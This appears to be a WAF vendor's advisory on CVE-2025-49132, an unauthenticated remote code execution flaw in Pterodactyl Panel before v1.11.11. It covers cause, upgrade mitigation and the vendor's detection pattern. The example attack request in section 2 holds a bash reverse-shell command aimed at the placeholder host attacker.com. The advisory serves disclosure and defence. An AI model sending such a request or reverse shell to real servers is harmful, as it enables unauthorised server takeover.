CVE-2025-49132 is a critical RCE vulnerability that allows information disclosure or code execution within the Pterodactyl Panel server without authentication.
Attackers can steal configurations or take control of the server, making prompt patching extremely important.
Our AIWAF product is developing detection patterns to address vulnerabilities identified within Pterodactyl and will continue to respond quickly to newly discovered vulnerabilities.
1. Overview
Pterodactyl Panel is an open-source game server management panel designed to allow users to easily deploy and manage various game servers in a web-based environment.
The panel leverages Docker and container-based architecture to ensure scalability and stability, while providing intuitive UI and fine-grained access control in multi-user environments. In both enterprise and community contexts, it is widely used for multi-game server operations, hosting automation, user management, and resource monitoring.
This report summarizes the analysis of the recently identified unauthenticated Remote Code Execution (RCE) vulnerability (CVE-2025-49132), discovered in versions prior to Pterodactyl Panel v1.11.11.
Source : https://pterodactyl.io/
2. Attack Type
CVE-2025-49132 is a Remote Code Execution (RCE) vulnerability discovered in versions of Pterodactyl Panel prior to v1.11.11.
The root cause of this vulnerability lies in authentication bypass and insufficient input validation.
An attacker can exploit flaws in session validation logic or improper permission handling during specific API requests in Pterodactyl Panel.
Commands that should normally require administrator privileges can be executed through manipulated requests even without authentication.
Pterodactyl Panel provides command execution features that interact with Docker containers and host systems for server management convenience.
However, because inputs are insufficiently filtered and executed directly on the server side, attackers can inject malicious requests that trigger arbitrary system commands.
Through this, attackers can obtain reverse shells, download and execute files, install backdoors, and ultimately seize full control of the server.
Example Attack Request:
POST /api/servers/123/execute HTTP/1.1
Host: vulnerable-pterodactyl.example.com
Authorization: Bearer <manipulated or missing token>
Content-Type: application/json
{
"command": "bash -i >& /dev/tcp/attacker.com/4444 0>&1"
}
If the above request is successfully processed, the server executes the bash command, establishing a reverse shell connection to the attacker’s server (attacker.com).
From there, the attacker can enter the server environment and carry out further malicious actions.
3. Mitigation
Pterodactyl addressed this vulnerability in v1.11.11. The most reliable countermeasure is to immediately update to this version or later, which includes improved input validation and path traversal protection.
Our AIWAF product responds to this threat through the 311: Command Injection (Unix) 2 detection pattern.
4. Conclusion
CVE-2025-49132 is a critical RCE vulnerability that allows unauthenticated remote information exposure or code execution within the Pterodactyl Panel server.
Attackers can steal configurations or take over the server, making prompt patching essential.
Our AIWAF product will continue developing detection patterns to address vulnerabilities identified in Pterodactyl and will respond swiftly to any newly discovered vulnerabilities.
